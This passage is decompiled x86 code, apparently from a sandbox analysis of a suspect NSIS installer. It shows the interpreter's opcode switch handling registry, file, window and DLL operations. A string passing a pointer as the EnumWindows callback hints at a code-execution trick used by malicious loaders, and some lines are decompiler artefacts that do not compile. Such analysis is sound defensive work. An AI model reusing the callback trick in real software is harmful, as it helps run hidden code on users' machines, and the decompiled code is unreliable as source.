                                                                            								__esi = _t111;
                                                                            								goto L133;
                                                                            							case 0xb:
                                                                            								__esi = __esi << __cl;
                                                                            								goto L149;
                                                                            							case 0xc:
                                                                            								__esi = __esi >> __cl;
                                                                            								goto L149;
                                                                            							case 0xd:
                                                                            								__eflags = __esi;
                                                                            								goto L149;
                                                                            						}
                                                                            					case 0x1c:
                                                                            						__esi = E0040303E(__edx, 1);
                                                                            						E00403002(2) = wsprintfW(__edi, __esi, __eax);
                                                                            						__esp = __esp + 0x10;
                                                                            						goto L391;
                                                                            					case 0x1d:
                                                                            						__ecx = _v684;
                                                                            						__esi =  *0x40b100; // 0x0
                                                                            						__eflags = __ecx;
                                                                            						if(__ecx == 0) {
                                                                            							__eflags = __eax;
                                                                            							if(__eax == 0) {
                                                                            								__eax = GlobalAlloc(0x40, 0x804); // executed
                                                                            								_push(_v692);
                                                                            								__esi = __eax;
                                                                            								_t118 = __esi + 4; // 0x4
                                                                            								__eax = _t118;
                                                                            								_push(_t118);
                                                                            								__eax = E00405EBA();
                                                                            								__eax =  *0x40b100; // 0x0
                                                                            								 *__esi = __eax;
                                                                            								 *0x40b100 = __esi;
                                                                            								goto L391;
                                                                            							}
                                                                            							__eflags = __esi;
                                                                            							if(__esi == 0) {
                                                                            								goto L28;
                                                                            							}
                                                                            							_t116 = __esi + 4; // 0x4
                                                                            							_t116 = E00406B1A(__edi, _t116);
                                                                            							__eax =  *__esi;
                                                                            							 *0x40b100 =  *__esi;
                                                                            							__eax = GlobalFree(__esi);
                                                                            							goto L391;
                                                                            						} else {
                                                                            							goto L153;
                                                                            						}
                                                                            						while(1) {
                                                                            							L153:
                                                                            							__ecx = __ecx - 1;
                                                                            							__eflags = __esi;
                                                                            							if(__esi == 0) {
                                                                            								goto L158;
                                                                            							}
                                                                            							__esi =  *__esi;
                                                                            							__eflags = __ecx;
                                                                            							if(__ecx != 0) {
                                                                            								continue;
                                                                            							}
                                                                            							__eflags = __esi;
                                                                            							if(__esi == 0) {
                                                                            								goto L158;
                                                                            							}
                                                                            							__esi = __esi + 4;
                                                                            							__edi = L"Call";
                                                                            							__eax = E00406B1A(__edi, __esi);
                                                                            							__eax =  *0x40b100; // 0x0
                                                                            							__eax = E00406B1A(__esi, __eax);
                                                                            							__eax =  *0x40b100; // 0x0
                                                                            							_push(__edi);
                                                                            							__eax = __eax + 4;
                                                                            							__eflags = __eax;
                                                                            							_push(__eax);
                                                                            							goto L157;
                                                                            						}
                                                                            						goto L158;
                                                                            					case 0x1e:
                                                                            						__esi = E00403002(3);
                                                                            						_v712 = __esi;
                                                                            						0 = E00403002(4);
                                                                            						__eax = _v672;
                                                                            						__eflags = __al & 0x00000001;
                                                                            						if((__al & 0x00000001) != 0) {
                                                                            							__esi = E0040303E(__edx, 0x33);
                                                                            							__eax = _v680.dwHighDateTime;
                                                                            							_v716 = __esi;
                                                                            						}
                                                                            						__eflags = __al & 0x00000002;
                                                                            						if((__al & 0x00000002) != 0) {
                                                                            							0 = E0040303E(__edx, 0x44);
                                                                            						}
                                                                            						__eflags = _v696 - 0x21;
                                                                            						_push(1);
                                                                            						if(_v696 != 0x21) {
                                                                            							__esi = E0040303E(__edx);
                                                                            							__eax = E0040303E(__edx);
                                                                            							__ecx = 0;
                                                                            							__eflags =  *__eax - __bp;
                                                                            							 !=  ? __eax : 0 = 0;
                                                                            							__eflags =  *__esi - __bp;
                                                                            							__ecx =  !=  ? __esi : 0;
                                                                            							__eax = FindWindowExW(_v720, __ebx,  !=  ? __esi : 0,  !=  ? __eax : 0);
                                                                            							goto L172;
                                                                            						} else {
                                                                            							_v712 = E00403002();
                                                                            							__eax = E00403002(2);
                                                                            							__ecx = _v672;
                                                                            							__ecx = _v672 >> 2;
                                                                            							__eflags = __ecx;
                                                                            							if(__ecx == 0) {
                                                                            								__eax = SendMessageW(_v712, __eax, __esi, __ebx);
                                                                            								L172:
                                                                            								_v704 = __eax;
                                                                            								L173:
                                                                            								__eflags = _v692 - __ebp;
                                                                            								if(_v692 < __ebp) {
                                                                            									goto L391;
                                                                            								}
                                                                            								goto L98;
                                                                            							}
                                                                            							__edx =  &_v704;
                                                                            							__eax =  ~__eax;
                                                                            							asm("sbb ebx, ebx");
                                                                            							__eax = _v704;
                                                                            							_v716 = 0;
                                                                            							goto L173;
                                                                            						}
                                                                            					case 0x1f:
                                                                            						__eax = E00403002(0);
                                                                            						__eax = IsWindow(__eax);
                                                                            						L176:
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							L110:
                                                                            							__eax = _v684;
                                                                            							return _v684;
                                                                            						}
                                                                            						__eax = _v688;
                                                                            						return _v688;
                                                                            					case 0x20:
                                                                            						__esi = E00403002(2);
                                                                            						__eax = E00403002(1);
                                                                            						__eax = GetDlgItem(__eax, __esi);
                                                                            						goto L98;
                                                                            					case 0x21:
                                                                            						__esi =  *0x435a48;
                                                                            						__esi =  *0x435a48 + __eax;
                                                                            						E00403002(0) = SetWindowLongW(__eax, 0xffffffeb, __esi);
                                                                            						goto L391;
                                                                            					case 0x22:
                                                                            						__eflags = _v680.dwLowDateTime & 0x00000100;
                                                                            						if((_v680.dwLowDateTime & 0x00000100) == 0) {
                                                                            							__eax = GetDlgItem(__edx, _v684);
                                                                            						} else {
                                                                            							__eax = E00403002(2);
                                                                            						}
                                                                            						__ebp = __eax;
                                                                            						__eax = _v680.dwLowDateTime;
                                                                            						__ecx = __eax;
                                                                            						__ebx = __eax;
                                                                            						__ecx = __eax & 0x00000004;
                                                                            						__ebx = __eax >> 0x1e;
                                                                            						_v704 = __eax & 0x00000004;
                                                                            						__esi = __eax;
                                                                            						__ecx = __eax;
                                                                            						__esi = __eax & 0x00000003;
                                                                            						__ecx = __eax >> 0x1f;
                                                                            						__ebx = __eax >> 0x0000001e & 0x00000001;
                                                                            						_v708 = __eax >> 0x1f;
                                                                            						__eflags = __eax & 0x00010000;
                                                                            						if((__eax & 0x00010000) == 0) {
                                                                            							__eax = _v688 & 0x0000ffff;
                                                                            						} else {
                                                                            							__eax = E0040303E(__edx, 0x11);
                                                                            						}
                                                                            						_v712 = __eax;
                                                                            						 &_v652 = GetClientRect(__ebp,  &_v652);
                                                                            						_v680.dwLowDateTime = _v680.dwLowDateTime & 0x0000fef0;
                                                                            						_v640 = _v640 * 0;
                                                                            						_v644 = _v644 * _v708;
                                                                            						__eax = 0;
                                                                            						__eflags = _v704;
                                                                            						__eax =  !=  ?  *0x4349f4 : 0;
                                                                            						0 = LoadImageW( !=  ?  *0x4349f4 : 0, _v712, __esi, _v644 * _v708, _v640 * 0, _v680.dwLowDateTime & 0x0000fef0);
                                                                            						__eax = SendMessageW(__ebp, 0x172, __esi, __ebx);
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__eflags = __esi;
                                                                            							if(__esi == 0) {
                                                                            								__eax = DeleteObject(__eax);
                                                                            							}
                                                                            						}
                                                                            						__eflags = _v692;
                                                                            						if(_v692 < 0) {
                                                                            							goto L391;
                                                                            						} else {
                                                                            							_push(__ebx);
                                                                            							goto L20;
                                                                            						}
                                                                            					case 0x23:
                                                                            						__edi = GetDC(__edx);
                                                                            						__esi = E00403002(2);
                                                                            						__eax = GetDeviceCaps(__edi, 0x5a);
                                                                            						__eax = MulDiv(__esi, __eax, 0x48);
                                                                            						0x40d908->lfHeight = __eax;
                                                                            						_v708 = ReleaseDC(_v708, __edi);
                                                                            						__eax = E00403002(3);
                                                                            						__ecx = _v684;
                                                                            						_push(_v696);
                                                                            						 *0x40d918 = __eax;
                                                                            						__cl = __cl & 0x00000001;
                                                                            						 *0x40d91f = 1;
                                                                            						 *0x40d91c = __cl & 0x00000001;
                                                                            						__al = __cl;
                                                                            						__al = __cl & 0x00000002;
                                                                            						__cl = __cl & 0x00000004;
                                                                            						_push("Calibri");
                                                                            						 *0x40d91d = __al;
                                                                            						 *0x40d91e = __cl;
                                                                            						__eax = E00405EBA();
                                                                            						__eax = CreateFontIndirectW(0x40d908);
                                                                            						__ebp = _v724;
                                                                            						_push(__eax);
                                                                            						_push(_v724);
                                                                            						goto L21;
                                                                            					case 0x24:
                                                                            						__esi = E00403002(0);
                                                                            						_push(E00403002(1));
                                                                            						_push(__esi);
                                                                            						__eflags = _v680.dwLowDateTime;
                                                                            						if(_v680.dwLowDateTime != 0) {
                                                                            							__eax = EnableWindow();
                                                                            						} else {
                                                                            							__eax = ShowWindow();
                                                                            						}
                                                                            						goto L391;
                                                                            					case 0x25:
                                                                            						0 = E0040303E(__edx, 0);
                                                                            						__esi = E0040303E(__edx, 0x31);
                                                                            						__edi = E0040303E(__edx, 0x22);
                                                                            						E0040303E(__edx, 0x15) = E00405D3A(0xffffffec, "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            						__ecx = _v700;
                                                                            						__eax = _v724;
                                                                            						_v668 = _v724;
                                                                            						__eax = 0;
                                                                            						_v672 = _v700;
                                                                            						__ecx = _v704;
                                                                            						_v648 = __ecx;
                                                                            						__eflags =  *__ebx - __bp;
                                                                            						_v660 = __esi;
                                                                            						__eax =  !=  ? __ebx : 0;
                                                                            						_v664 =  !=  ? __ebx : 0;
                                                                            						__eax = 0;
                                                                            						__eflags =  *__edi - __bp;
                                                                            						_v652 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Forcible";
                                                                            						__eax =  !=  ? __edi : 0;
                                                                            						_v656 =  !=  ? __edi : 0;
                                                                            						__eax =  &(_v680.dwHighDateTime);
                                                                            						__eax = E004069F3( &(_v680.dwHighDateTime));
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							goto L28;
                                                                            						}
                                                                            						__eflags = _v648 & 0x00000040;
                                                                            						if((_v648 & 0x00000040) == 0) {
                                                                            							goto L391;
                                                                            						}
                                                                            						__eax = E00406514(__ecx, _v596.dwFileAttributes);
                                                                            						__eax = CloseHandle( *(__esp + 0x88));
                                                                            						goto L198;
                                                                            					case 0x26:
                                                                            						__esi = E0040303E(__edx, 0);
                                                                            						__eax = E00405D3A(0xffffffeb, __eax);
                                                                            						__eax = E004066D6(__esi); // executed
                                                                            						__ebx = _v732;
                                                                            						__esi = __eax;
                                                                            						__eflags = __esi;
                                                                            						if(__esi == 0) {
                                                                            							goto L28;
                                                                            						}
                                                                            						__eflags = _v684;
                                                                            						if(_v684 != 0) {
                                                                            							__eax = E00406514(__ecx, __esi);
                                                                            							__eflags = _v692;
                                                                            							if(_v692 < 0) {
                                                                            								0 = 1;
                                                                            								__eflags = __eax;
                                                                            								_v716 = 0;
                                                                            							} else {
                                                                            								__eax = E0040661F(_v712, __eax);
                                                                            							}
                                                                            						}
                                                                            						__eax = CloseHandle(__esi);
                                                                            						goto L198;
                                                                            					case 0x27:
                                                                            						__eax = E0040303E(__edx, 2);
                                                                            						0 = __eax;
                                                                            						__eflags = __ebx;
                                                                            						if(__ebx == 0) {
                                                                            							__eax = 0;
                                                                            							 *__edi = __ax;
                                                                            							 *__esi = __ax;
                                                                            							goto L28;
                                                                            						}
                                                                            						__eax = E0040661F(__esi, __ebx[0xa]);
                                                                            						_push(__ebx[0xc]);
                                                                            						goto L20;
                                                                            					case 0x28:
                                                                            						__eax = E0040303E(__edx, 0xffffffee);
                                                                            						__ecx =  &_v656;
                                                                            						_v660 = __eax;
                                                                            						_push( &_v656);
                                                                            						_push(__eax);
                                                                            						__eax = E004068E6(0xa);
                                                                            						__eax =  *__eax();
                                                                            						__ecx = 0;
                                                                            						_v724 = __eax;
                                                                            						__ebx = 0;
                                                                            						 *__edi = __cx;
                                                                            						__ebx = 1;
                                                                            						 *__esi = __cx;
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__eax = GlobalAlloc(0x40, __eax);
                                                                            							_v712 = __eax;
                                                                            							__eflags = __eax;
                                                                            							if(__eax != 0) {
                                                                            								__esi = E004068E6(0xb);
                                                                            								__eax = E004068E6(0xc);
                                                                            								_push(_v720);
                                                                            								_v716 = __eax;
                                                                            								_push(_v724);
                                                                            								_push(0);
                                                                            								_push(_v672);
                                                                            								__eax =  *__esi();
                                                                            								__eflags = __eax;
                                                                            								if(__eax != 0) {
                                                                            									__eax =  &_v688;
                                                                            									_push( &_v688);
                                                                            									__eax =  &_v692;
                                                                            									_push( &_v692);
                                                                            									_push(0x4092b0);
                                                                            									_push(_v728);
                                                                            									__eax = _v724();
                                                                            									__eflags = __eax;
                                                                            									if(__eax != 0) {
                                                                            										__ecx = _v708;
                                                                            										_v720 = E0040661F(__edi,  *((intOrPtr*)(_v708 + 8 + _v720 * 4)));
                                                                            										__ecx = _v728;
                                                                            										_v716 = E0040661F(_v760,  *((intOrPtr*)(_v716 + 0xc + _v728 * 4)));
                                                                            										__ebx = 0;
                                                                            									}
                                                                            								}
                                                                            								__eax = GlobalFree(_v728);
                                                                            							}
                                                                            						}
                                                                            						goto L392;
                                                                            					case 0x29:
                                                                            						__esi = 0;
                                                                            						__esi = 1;
                                                                            						__ebx = 1;
                                                                            						__eflags =  *0x435a60;
                                                                            						if( *0x435a60 < 0) {
                                                                            							_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            							_push(0xffffffe7);
                                                                            							goto L230;
                                                                            						}
                                                                            						__edi = E0040303E(__edx, 0xfffffff0);
                                                                            						_v712 = __edi;
                                                                            						_v720 = E0040303E(__edx, 1);
                                                                            						__eflags = _v684;
                                                                            						if(_v684 == 0) {
                                                                            							L218:
                                                                            							__eax = LoadLibraryExW(__edi, __ebp, 8); // executed
                                                                            							__edi = __eax;
                                                                            							__eflags = __edi;
                                                                            							if(__eflags == 0) {
                                                                            								_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            								_push(0xfffffff6);
                                                                            								goto L230;
                                                                            							}
                                                                            							L219:
                                                                            							0 = E00406269(__eflags, __edi, _v712);
                                                                            							_v716 = __ecx;
                                                                            							__eflags = __ecx;
                                                                            							if(__ecx == 0) {
                                                                            								__eax = E00405D3A(0xfffffff7, _v712);
                                                                            							} else {
                                                                            								__ebx = __ebp;
                                                                            								__eflags = _v684 - __ebp;
                                                                            								if(_v684 == __ebp) {
                                                                            									__eax = _v700;
                                                                            									_push(0x40b000);
                                                                            									_push(0x40b100);
                                                                            									_push(L"user32::EnumWindows(i r1 ,i 0)");
                                                                            									_push(0x400);
                                                                            									_push(_v700);
                                                                            									__eax =  *__ecx();
                                                                            									__esp = __esp + 0x14;
                                                                            								} else {
                                                                            									__eax = E00405D3A(_v684, "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            									__eax = _v716();
                                                                            									__eflags = __eax;
                                                                            									if(__eax != 0) {
                                                                            										__ebx = __esi;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            							__eflags = _v680.dwLowDateTime - __ebp;
                                                                            							if(_v680.dwLowDateTime == __ebp) {
                                                                            								__eax = E00403CD6(__edi);
                                                                            								__eflags = __eax;
                                                                            								if(__eax != 0) {
                                                                            									__eax = FreeLibrary(__edi);
                                                                            								}
                                                                            							}
                                                                            							goto L392;
                                                                            						}
                                                                            						__eax = GetModuleHandleW(__edi); // executed
                                                                            						__edi = __eax;
                                                                            						__eflags = __edi;
                                                                            						if(__eflags != 0) {
                                                                            							goto L219;
                                                                            						}
                                                                            						__edi = _v708;
                                                                            						goto L218;
                                                                            					case 0x2a:
                                                                            						_v656 = E0040303E(__edx, 0xfffffff0);
                                                                            						__eax = E0040303E(__edx, 0xffffffdf);
                                                                            						__ebx = __eax;
                                                                            						_v716 = __eax;
                                                                            						_v672 = E0040303E(__edx, 2);
                                                                            						_v672 = E0040303E(__edx, 0xffffffcd);
                                                                            						_v684 = E0040303E(__edx, 0x45);
                                                                            						__eax = _v696;
                                                                            						__eax = __eax & 0x00000fff;
                                                                            						__edi = __eax;
                                                                            						_v720 = __eax & 0x00000fff;
                                                                            						__ecx = __eax;
                                                                            						__ecx = __eax & 0x00008000;
                                                                            						__eax = __eax >> 0x10;
                                                                            						__edi = __edi >> 0xc;
                                                                            						_v724 = __ecx;
                                                                            						__edi = __edi & 0x00000007;
                                                                            						_v688 = __eax;
                                                                            						__eax = E00406E03(__ebx);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							__eax = E0040303E(__edx, 0x21);
                                                                            						}
                                                                            						__eax =  &_v716;
                                                                            						__esi = 0;
                                                                            						_push(__eax);
                                                                            						_push(0x409abc);
                                                                            						__esi = 1;
                                                                            						_push(1);
                                                                            						_push(__ebp);
                                                                            						_push(0x409adc);
                                                                            						__imp__CoCreateInstance();
                                                                            						__ebx = __eax;
                                                                            						__eflags = __ebx;
                                                                            						if(__ebx >= 0) {
                                                                            							__eax = _v736;
                                                                            							__edx =  &_v732;
                                                                            							_push( &_v732);
                                                                            							_push(0x409acc);
                                                                            							_push(__eax);
                                                                            							__ecx =  *__eax;
                                                                            							0 = __eax;
                                                                            							__eflags = __ebx;
                                                                            							if(__ebx >= 0) {
                                                                            								__eax =  *(__esp + 0x10);
                                                                            								_push(_v740);
                                                                            								_push(__eax);
                                                                            								__ecx =  *__eax;
                                                                            								0 = __eax;
                                                                            								__eflags = _v744 - __ebp;
                                                                            								if(_v744 == __ebp) {
                                                                            									__eax = _v756;
                                                                            									_push(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring\\Forcible");
                                                                            									_push(__eax);
                                                                            									__ecx =  *__eax;
                                                                            									__eax =  *((intOrPtr*)( *__eax + 0x24))();
                                                                            								}
                                                                            								__eflags = __edi;
                                                                            								if(__edi != 0) {
                                                                            									__eax = _v756;
                                                                            									_push(__edi);
                                                                            									_push(__eax);
                                                                            									__ecx =  *__eax;
                                                                            									__eax =  *((intOrPtr*)( *__eax + 0x3c))();
                                                                            								}
                                                                            								__eax = _v756;
                                                                            								_push(_v708);
                                                                            								_push(__eax);
                                                                            								__ecx =  *__eax;
                                                                            								__eax =  *((intOrPtr*)( *__eax + 0x34))();
                                                                            								__edx = _v704;
                                                                            								__eflags = __edx->i - __bp;
                                                                            								if(__edx->i != __bp) {
                                                                            									__eax = _v764;
                                                                            									_push( *((intOrPtr*)(__esp + 0x20)));
                                                                            									_push(__edx);
                                                                            									__ecx =  *__eax;
                                                                            									_push(__eax);
                                                                            									__eax =  *((intOrPtr*)( *__eax + 0x44))();
                                                                            								}
                                                                            								__eax = _v764;
                                                                            								_push(_v708);
                                                                            								_push(__eax);
                                                                            								__ecx =  *__eax;
                                                                            								__eax =  *((intOrPtr*)( *__eax + 0x2c))();
                                                                            								__eax =  *(__esp + 0x10);
                                                                            								_push(_v720);
                                                                            								_push(__eax);
                                                                            								__ecx =  *__eax;
                                                                            								__eax =  *((intOrPtr*)( *__eax + 0x1c))();
                                                                            								__eflags = __ebx;
                                                                            								if(__ebx >= 0) {
                                                                            									__eax = _v776;
                                                                            									_push(__esi);
                                                                            									_push(_v716);
                                                                            									__ecx =  *__eax;
                                                                            									_push(__eax);
                                                                            									0 = __eax;
                                                                            								}
                                                                            								__eax = _v776;
                                                                            								_push(__eax);
                                                                            								__ecx =  *__eax;
                                                                            								__eax =  *((intOrPtr*)( *__eax + 8))();
                                                                            							}
                                                                            							__eax =  *(__esp + 0x10);
                                                                            							_push(__eax);
                                                                            							__ecx =  *__eax;
                                                                            							__eax =  *((intOrPtr*)( *__eax + 8))();
                                                                            						}
                                                                            						__ebx = 0 >> 0x1f;
                                                                            						0xbadbac = 0xbadba0;
                                                                            						__eax = E00405D3A(0xbadba0, "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            						__ebx = __ebx >> 0x1f;
                                                                            						goto L392;
                                                                            					case 0x2b:
                                                                            						__esi = E0040303E(__edx, 0);
                                                                            						__edi = E0040303E(__edx, 0x11);
                                                                            						0 = E0040303E(__edx, 0x23);
                                                                            						__eax = E004065CF(__esi);
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__eax = _v700;
                                                                            							_v652 = _v700;
                                                                            							_v648 = 2;
                                                                            							__eax = lstrlenW(__esi);
                                                                            							__ecx = 0;
                                                                            							 *(__esi + 2 + __eax * 2) = __cx;
                                                                            							__eax = lstrlenW(__edi);
                                                                            							__ecx = 0;
                                                                            							 *(__edi + 2 + __eax * 2) = __cx;
                                                                            							__ax = _v684;
                                                                            							_v644 = __esi;
                                                                            							_v640 = __edi;
                                                                            							 *(__esp + 0x72) = __ebx;
                                                                            							 *((short*)(__esp + 0x68)) = _v684;
                                                                            							E00405D3A(0, __ebx) =  &_v660;
                                                                            							__eax = SHFileOperationW( &_v660);
                                                                            							__eflags = __eax;
                                                                            							if(__eax == 0) {
                                                                            								goto L391;
                                                                            							}
                                                                            						}
                                                                            						__eax = E00405D3A(0xfffffff9, __ebp);
                                                                            						goto L28;
                                                                            					case 0x2c:
                                                                            						__eflags = __ecx - 0xbadf00d;
                                                                            						if(__ecx != 0xbadf00d) {
                                                                            							L158:
                                                                            							_push(0x200010);
                                                                            							_push(0xffffffe8);
                                                                            							_push(__ebp);
                                                                            							_push(E00405EBA());
                                                                            							L89:
                                                                            							__eax = E00406AA8();
                                                                            							L5:
                                                                            							__eax = 0x7fffffff;
                                                                            							return 0x7fffffff;
                                                                            						}
                                                                            						 *0x435ad4 =  *0x435ad4 + 1;
                                                                            						goto L391;
                                                                            					case 0x2d:
                                                                            						__esi = 0;
                                                                            						__edi = 0;
                                                                            						__eflags = __ecx;
                                                                            						if(__ecx != 0) {
                                                                            							__ebp = E0040303E(__edx, 0);
                                                                            							__eax = _v692;
                                                                            						}
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							__esi = E0040303E(__edx, 0x11);
                                                                            						}
                                                                            						__eflags = _v680.dwHighDateTime - __edi;
                                                                            						if(_v680.dwHighDateTime != __edi) {
                                                                            							__edi = E0040303E(__edx, 0x22);
                                                                            						}
                                                                            						__eax = E0040303E(__edx, 0xffffffcd);
                                                                            						__eax = WritePrivateProfileStringW(__ebp, __esi, __edi, __eax); // executed
                                                                            						L27:
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							goto L391;
                                                                            						}
                                                                            						goto L28;
                                                                            					case 0x2e:
                                                                            						__ebx = 0;
                                                                            						_v652 = 0xa;
                                                                            						__ebx = 1;
                                                                            						__edi = E0040303E(__edx, 1);
                                                                            						__esi = E0040303E(__edx, 0x12);
                                                                            						__eax = E0040303E(__edx, 0xffffffdd);
                                                                            						__ebp = _v716;
                                                                            						 &_v664 = GetPrivateProfileStringW(__edi, __esi,  &_v664, __ebp, 0x3ff,  &_v664);
                                                                            						_push(0xa);
                                                                            						_pop(__eax);
                                                                            						__eflags =  *__ebp - __ax;
                                                                            						if( *__ebp != __ax) {
                                                                            							goto L391;
                                                                            						}
                                                                            						__eax = 0;
                                                                            						 *__ebp = __ax;
                                                                            						goto L392;
                                                                            					case 0x2f:
                                                                            						__edi = 0;
                                                                            						__edi = 1;
                                                                            						__eflags = _v680.dwHighDateTime;
                                                                            						if(__eflags != 0) {
                                                                            							__eax = E0040303E(__edx, 0x22);
                                                                            							_v680.dwLowDateTime = _v680.dwLowDateTime >> 1;
                                                                            							__ecx = _v672;
                                                                            							__edi = __eax;
                                                                            						} else {
                                                                            							__eax = E004030C1(__ecx, __edx, __eflags, 2); // executed
                                                                            							__esi = __eax;
                                                                            							__eflags = __esi;
                                                                            							if(__esi != 0) {
                                                                            								__eax = E0040303E(__edx, 0x33);
                                                                            								__edi = __eax;
                                                                            								__eax = RegCloseKey(__esi);
                                                                            							}
                                                                            						}
                                                                            						__ebx = 0;
                                                                            						__eflags = __edi;
                                                                            						__ebx = 0 | __edi != 0x00000000;
                                                                            						goto L392;
                                                                            					case 0x30:
                                                                            						__eax = _v680.dwHighDateTime;
                                                                            						_v708 = _v680.dwHighDateTime;
                                                                            						__eax = _v672;
                                                                            						_v712 = _v672;
                                                                            						_v708 = E0040303E(__edx, 2);
                                                                            						__eax = E0040303E(__edx, 0x11);
                                                                            						__ecx =  &_v672;
                                                                            						0 = 1;
                                                                            						__ebx = 1;
                                                                            						__eax = E00403023(_v660);
                                                                            						__eax = E004062A5(__eflags, __eax, __eax, 0x100022,  &_v672); // executed
                                                                            						__edi = _v692;
                                                                            						__ecx = 0;
                                                                            						__eflags = __eax;
                                                                            						__edi =  !=  ? 0 : _v692;
                                                                            						_v680.dwLowDateTime = __edi;
                                                                            						__eflags = __edi;
                                                                            						if(__edi == 0) {
                                                                            							goto L392;
                                                                            						}
                                                                            						__eax = _v708;
                                                                            						__edi = 0x40c108;
                                                                            						__eflags = __eax - 1;
                                                                            						if(__eax != 1) {
                                                                            							_push(4);
                                                                            							_pop(__esi);
                                                                            							__eflags = __eax - 1;
                                                                            							if(__eax != 1) {
                                                                            								__esi = 0;
                                                                            								__eflags = __eax - 3;
                                                                            								if(__eax == 3) {
                                                                            									0 = E00403148(_v680.dwLowDateTime, 0, 0x40c108, 0x1800);
                                                                            								}
                                                                            							} else {
                                                                            								 *0x40c108 = E00403002(3);
                                                                            							}
                                                                            						} else {
                                                                            							__eax = E0040303E(__edx, 0x23);
                                                                            							0 = 2 + lstrlenW(0x40c108) * 2;
                                                                            						}
                                                                            						__esi = _v652;
                                                                            						__eax = RegSetValueExW(__esi, _v704, __ebp, _v712, __edi, __esi); // executed
                                                                            						__eax =  ~__eax;
                                                                            						asm("sbb eax, eax");
                                                                            						__eflags = 0;
                                                                            						goto L274;
                                                                            					case 0x31:
                                                                            						__eax = E004030C1(__ecx, __edx, __eflags, 0x20019); // executed
                                                                            						__esi = __eax;
                                                                            						__eax = E0040303E(__edx, 0x33);
                                                                            						__ecx = 0;
                                                                            						 *__edi = __cx;
                                                                            						__eflags = __esi;
                                                                            						if(__esi == 0) {
                                                                            							goto L28;
                                                                            						}
                                                                            						__ecx =  &_v652;
                                                                            						_v652 = 0x800;
                                                                            						__ecx =  &_v704;
                                                                            						__eax = RegQueryValueExW(__esi, __eax, 0,  &_v704, __edi,  &_v652); // executed
                                                                            						__ecx = 0;
                                                                            						__ecx = 1;
                                                                            						__eflags = __eax;
                                                                            						if(__eax != 0) {
                                                                            							L282:
                                                                            							__eax = 0;
                                                                            							__ebx = __ecx;
                                                                            							 *__edi = __ax;
                                                                            							L274:
                                                                            							__eax = RegCloseKey(__esi); // executed
                                                                            							goto L392;
                                                                            						}
                                                                            						__eflags = _v704 - 4;
                                                                            						if(_v704 == 4) {
                                                                            							__ebx = 0;
                                                                            							__eflags = _v680.dwHighDateTime;
                                                                            							__ebx = 0 | _v680.dwHighDateTime == 0x00000000;
                                                                            							__eax = E0040661F(__edi,  *__edi);
                                                                            							goto L274;
                                                                            						}
                                                                            						__eflags = _v704 - 1;
                                                                            						if(_v704 == 1) {
                                                                            							L280:
                                                                            							__ebx = _v680.dwHighDateTime;
                                                                            							__eax = 0;
                                                                            							 *(__edi + 0x7fe) = __ax;
                                                                            							goto L274;
                                                                            						}
                                                                            						__eflags = _v704 - 2;
                                                                            						if(_v704 != 2) {
                                                                            							goto L282;
                                                                            						}
                                                                            						goto L280;
                                                                            					case 0x32:
                                                                            						__eax = E004030C1(__ecx, __edx, __eflags, 0x20019); // executed
                                                                            						__esi = __eax;
                                                                            						__eax = E00403002(3);
                                                                            						__ebx = _v720;
                                                                            						__ecx = 0;
                                                                            						 *__edi = __cx;
                                                                            						__eflags = __esi;
                                                                            						if(__esi == 0) {
                                                                            							goto L28;
                                                                            						}
                                                                            						__ecx = 0x3ff;
                                                                            						_v652 = 0x3ff;
                                                                            						__eflags = _v680.dwHighDateTime;
                                                                            						if(_v680.dwHighDateTime == 0) {
                                                                            							__ecx =  &_v652;
                                                                            							__eax = RegEnumValueW(__esi, __eax, __edi,  &_v652, 0, 0, 0, 0);
                                                                            							0 = 1;
                                                                            							__eflags = __eax;
                                                                            							_v716 = 0;
                                                                            						} else {
                                                                            							__eax = RegEnumKeyW(__esi, __eax, __edi, 0x3ff);
                                                                            						}
                                                                            						__eax = 0;
                                                                            						 *(__edi + 0x7fe) = __ax;
                                                                            						__eax = RegCloseKey(__esi);
                                                                            						goto L391;
                                                                            					case 0x33:
                                                                            						__eax = E00406C25(__edi);
                                                                            						__eflags = __eax;
                                                                            						if(__eax == 0) {
                                                                            							goto L391;
                                                                            						}
                                                                            						__eax = CloseHandle(__eax);
                                                                            						L198:
                                                                            						goto L391;
                                                                            					case 0x34:
                                                                            						__eax = E0040303E(__edx, 0xffffffed);
                                                                            						__eax = E0040691B(__eax, _v692, _v688);
                                                                            						__eflags = __eax - 0xffffffff;
                                                                            						if(__eax != 0xffffffff) {
                                                                            							L98:
                                                                            							_push(__eax);
                                                                            							L20:
                                                                            							_push(__edi);
                                                                            							goto L21;
                                                                            						}
                                                                            						goto L291;
                                                                            					case 0x35:
                                                                            						__ecx = _v696;
                                                                            						__eax = 0;
                                                                            						__edx = _v684;
                                                                            						__eflags = __ecx - 0x38;
                                                                            						_v652 = __edx;
                                                                            						__esi = 0x40b908;
                                                                            						__eax = 0 | __eflags == 0x00000000;
                                                                            						0 = 1;
                                                                            						_v712 = __eflags == 0;
                                                                            						__eflags = __edx;
                                                                            						if(__edx == 0) {
                                                                            							__eflags = __ecx - 0x38;
                                                                            							if(__ecx != 0x38) {
                                                                            								__eax = E0040303E(__edx, 0x11);
                                                                            								__eax = lstrlenW(__eax);
                                                                            								__eflags = __eax + __eax;
                                                                            							} else {
                                                                            								E0040303E(__edx, 0x21) = E00406469("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp", 0x40b908, 0x400);
                                                                            								__esi = lstrlenA(0x40b908);
                                                                            							}
                                                                            						} else {
